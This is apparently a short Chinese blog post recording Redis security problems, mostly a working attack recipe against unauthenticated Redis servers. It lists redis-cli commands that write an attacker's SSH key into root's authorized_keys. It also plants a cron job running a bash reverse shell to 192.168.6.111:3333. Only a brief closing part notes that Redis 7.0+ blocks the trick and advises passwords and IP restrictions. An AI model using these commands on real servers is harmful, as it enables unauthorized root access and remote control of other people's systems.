• 注册
    • 查看作者
    • redis安全问题记录

      redis安全问题记录

      redis-cli -h 127.0.0.1 -p 8002
      set xxx "\r\n ssh-rsa AAAABdfodf5sRBMfQE= root@test \r\n"
      config set dir /root/.ssh
      config set dbfilename authorized_keys
      save
      
      
      写入反弹shell
      redis-cli -h 192.168.6.111
      set xxx "\r\n*/**** /bin/bash -i >&/dev/tcp/192.168.6.111/3333 0>&1\r\n"
      config set dir /var/spool/cron
      config set dbfilename root
      save
      
      
      没问题版本redis7.0 以上
      config set dir /root/.ssh
      (error) ERR CONFIG SET failed (possibly related to argument 'dir') - can't set protected config
      
      redis配置这个也不行
      protected-mode yes
      
      安全建议
      redis要设置密码
      redis最好限制IP访问,只能内网访问

    • 0
    • 0
    • 0
    • 68
    • 请登录之后再进行评论

      登录
    • 做任务
    • 实时动态
    • 偏好设置
    • 单栏布局 侧栏位置: